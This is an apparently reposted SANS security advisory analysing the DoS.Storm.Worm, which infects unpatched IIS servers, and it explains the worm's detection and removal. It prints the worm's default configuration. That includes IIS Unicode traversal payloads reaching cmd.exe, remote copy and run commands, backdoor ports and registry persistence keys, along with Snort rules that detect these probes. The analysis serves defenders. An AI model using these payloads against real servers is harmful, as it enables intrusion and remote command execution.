|
Brought to you by:
Suppliers of:
|
|
|
| |
| DoS.Storm.Worm is a worm that seeks out Microsoft Internet Information Services (IIS) systems that have not applied the proper security patches. Any such systems that it finds are then infected with the worm. The payload of this worm performs a denial of service attack on www.microsoft.com. |
| |
Credit:
This write up can be found at:
http://www.incidents.org/react/dosstormworm.php
The information has been provided by Matt Fearnow of the SANS Institute, Johannes Ullrich of the SANS Institute and Lenny Zeltser and NIPC Labs.
|
| |
The Trojan is packed using UPX (the Ultimate Packer for eXecutables) and is written in Java. The main 'wrapper' class is 'runner.class'. It starts the various pieces.
1. Read 'datastore'
'datastore' is a class that is handed along and carries a number of configuration parameters. When 'datastore' is first instantiated, it looks for 'storm.cfg' and overwrites any default parameters with values with values it finds in storm.cfg. A new storm.cfg is written if it does not exist.
2. Send e-mail to 'emailreceive' (@gmx.net)
The body of the e-mail is one line listing the host name and IP address of the infected machine followed by the word 'startup.'
3. Setup TFTPd.
This will setup a TFTPd daemon on port 69.
4. Start 'scanner'.
This part scans hosts for a variety of strings to a web server. First, the version id is queried to check if the server runs IIS (see the datastore strings). The strings are listed in 'datastore' and start with 'v' (e.g. v1, v2 ...) the return value is compared to the 'r' strings (r1, r2) in datastore.
For vulnerable hosts, the 'installer' will then try and install (and start) storm on the new machine. See the 'copy' and 'start' variables in datastore. The installer verifies that the new copy is running.
5. Start 'telnetd'
Start a telnet server at the port given by 'telnetport' in datastore (default 23001). The username and password are given in 'user' and 'pwd'
6. Start 'dosd'
Dosd accesses each URL listed in datastore variables starting with 'dos'. By default, this is 'http://www.microsoft.com'
7. Start 'bombd'
Send an e-mail to each address listed in datastore with variable name starting with 'bomb' (e.g. bomb1). By default: gates@microsoft.com. The text of the message is in 'bombtext'
8. Start consoled
Opens console on port 23000 (or 'consoleport') using the same username password as telnetd. Looks like this can be used to remotely configure storm and overwrite various parameters in datastore.
9. Modify register.
All 'datastore' variables that start with 'register' are additions to the system registry. By default, only two are used 'register1' and 'register2' to start storm on reboot.
10. 'mailer'
Mailer sends an email the SMTP server specified in datastore (by default: mail.gmx.net). It uses a username/password to authenticate itself.
- --- default parameters from 'datastore.class' ---
banner=*********************** Storm (c) Agberd Celine 2000 ***********************
version=Storm v1.0
installed=?/c+tftp.exe+\
extract=?/c+storm.exe+\
run=?/c+c:\\winnt\\system32\\storm\\start.bat
extractresult=CGI
runresult=started.
smtp=mail.gmx.net
host=replacer
ttl=10000000
tftpdir=c:\\winnt\\system32\\storm\\
telnetport=23001
consoleport=23000
dos1=http://www.microsoft.com
copy=?/c+copy+storm.exe+c:\\winnt\\system32\\storm
copyresult=CGI
bomb1=gates@microsoft.com
bombtext=Fuck you!
check=?/c+dir
v1=/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe
v2=/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe
v3=/scripts/..%c1%1c../..%c1%1c../mssql7/install/pubtext.bat+&+cmd.exe /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe=installedresult
r1=c:
r2=d:
r3=e:
r4=C:
r5=D:
r6=E:
s1=Server:Microsoft-IIS/4.0
s2=Server:Microsoft-IIS/5.0
regiater1= HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\RunService\\666=c:\\winnt\\system32\\storm\\start.bat
register2= HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\Run\\666=c:\\winnt\\system32\\storm\\start.bat
shell=cmd.exe
systemlog1=Systemlog
Detection:
Snort will pick up the probes to IIS with this rule that is available from whitehats.com and snort.org:
http://www.whitehats.com/cgi/arachNIDS/Show?_id=ids452&view=signatures
alert TCP $EXTERNAL any -> $INTERNAL 80 (msg: "IDS452/web-iis_http-iis-unicode-binary"; flags: A+; content: "..|c0af|";nocase;)
http://www.whitehats.com/cgi/arachNIDS/Show?_id=ids432&view=signatures
alert TCP $EXTERNAL any -> $INTERNAL 80 (msg: "IDS432/web-iis_http-iis-unicode-traversal"; flags: A+; content: "..|25|c1|25|1c"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-MISC Attempt to execute cmd"; flags: A+; content:"cmd.exe"; nocase;)
Removal:
Symantec antivirus is able to detect and they provide a simple 'how to' in order to clean your system:
http://www.symantec.com/avcenter/venc/data/dos.storm.worm.html
This security advisory was prepared by Matt Fearnow of the SANS Institute and Johannes Ullrich of the SANS Institute.
Also contributing efforts go to Lenny Zeltser and NIPC Labs.
|
|
|
|
|
